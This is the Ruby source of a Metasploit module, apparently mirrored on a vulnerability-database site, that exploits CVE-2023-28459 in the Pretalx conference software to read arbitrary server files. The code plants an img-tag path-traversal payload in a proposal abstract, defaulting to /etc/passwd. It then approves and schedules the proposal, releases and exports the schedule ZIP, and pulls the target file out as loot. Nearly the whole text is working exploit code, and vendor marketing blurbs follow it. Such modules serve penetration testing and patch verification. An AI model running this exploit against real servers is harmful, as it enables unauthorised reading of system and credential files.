##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zip'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Pretalx
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Pretalx Arbitrary File Read/Limited File Write',
'Description' => 'This module exploits functionality in Pretalx that export conference schedule as zipped file. The Pretalx will iteratively include any file referenced by any HTML tag and does not properly check the path of the file, which can lead to arbitrary file read. The module requires credentials that allow schedule export, schedule release and approval of proposals. Additionally, module requires conference name and URL for media files.',
'Author' => [
'Stefan Schiller', # security researcher
'msutovsky-r7' # module dev
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-28459'], # file read
['CVE', '2023-28458'], # file write
['URL', 'https://www.sonarsource.com/blog/pretalx-vulnerabilities-how-to-get-accepted-at-every-conference/'],
['URL', 'https://pretalx.com/p/news/security-release-232/']
],
'DisclosureDate' => '2023-03-07',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
OptString.new('MEDIA_URL', [true, 'Prepend path to file path that allows arbitrary read', '/media']),
OptString.new('EMAIL', [true, 'User email to Pretalx backend']),
OptString.new('PASSWORD', [true, 'Password to Pretalx backend'])
])
register_advanced_options([
OptInt.new('ExportTimeout', [true, 'Set wait time for schedule export', 5])
])
end
def check_host(_ip)
return Exploit::CheckCode::Unknown('Login failed, please check credentials') unless login(datastore['EMAIL'], datastore['PASSWORD'])
version = get_version
return Exploit::CheckCode::Detected('Pretalx detected but unable to determine version') unless version
return Exploit::CheckCode::Appears("Detected vulnerable version #{version}") if version <= Rex::Version.new('2.3.1')
return Exploit::CheckCode::Safe("Detected version #{version} is not vulnerable")
rescue UnexpectedResponseError
return Exploit::CheckCode::Unknown('Received unexpected response, check your options')
rescue VersionCheckError
return Exploit::CheckCode::Detected('Pretalx detected, failed to verify version')
rescue CsrfError
return Exploit::CheckCode::Unknown('Failed to get CSRF token')
rescue SessionCookieError
return Exploit::CheckCode::Detected('Pretalx detected, failed to get session cookie - check your credentials')
end
def run_host(ip)
vprint_status('Register malicious proposal')
proposal_info = {
abstract: %<(<img src="#{datastore['MEDIA_URL']}//#{datastore['FILEPATH']}"/>>,
email: datastore['EMAIL'],
password: datastore['PASSWORD']
}
registration_info = register_proposal(proposal_info)
proposal_name = registration_info[:proposal_name]
vprint_status("Submit proposal #{proposal_name}")
vprint_status("Logging with credentials: #{datastore['EMAIL']}/#{datastore['PASSWORD']}")
fail_with(Failure::NoAccess, 'Incorrect credentials') unless login(datastore['EMAIL'], datastore['PASSWORD'])
vprint_status('Approving proposal')
approve_proposal(proposal_name)
vprint_status("Adding #{proposal_name} to schedule")
fail_with(Failure::Unknown, 'Failed to add submission to schedule') unless add_proposal_to_schedule(proposal_name)
vprint_status('Releasing schedule')
release_schedule
vprint_status('Exporting schedule')
export_zip
vprint_status('Wait for schedule ZIP to be exported')
sleep(datastore['ExportTimeout'])
vprint_status('Trying to extract target file')
zip_data = download_zip
zip = Zip::File.open_buffer(zip_data)
target_entry = zip.find_entry("#{datastore['CONFERENCE_NAME']}#{datastore['MEDIA_URL']}#{datastore['FILEPATH']}")
fail_with Failure::PayloadFailed, 'Failed to extract target file, check if export worked' unless target_entry
extracted_content = zip.read(zip.find_entry(target_entry))
vprint_status('Extraction successful')
loot_path = store_loot(
"pretalx.#{datastore['FILEPATH']}",
'text/plain',
ip,
extracted_content,
"pretalx-#{datastore['FILEPATH']}.txt",
'Pretalx'
)
print_status("Stored results in #{loot_path}")
report_vuln({
host: rhost,
port: rport,
name: name,
refs: references,
info: "Module #{fullname} successfully leaked file"
})
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation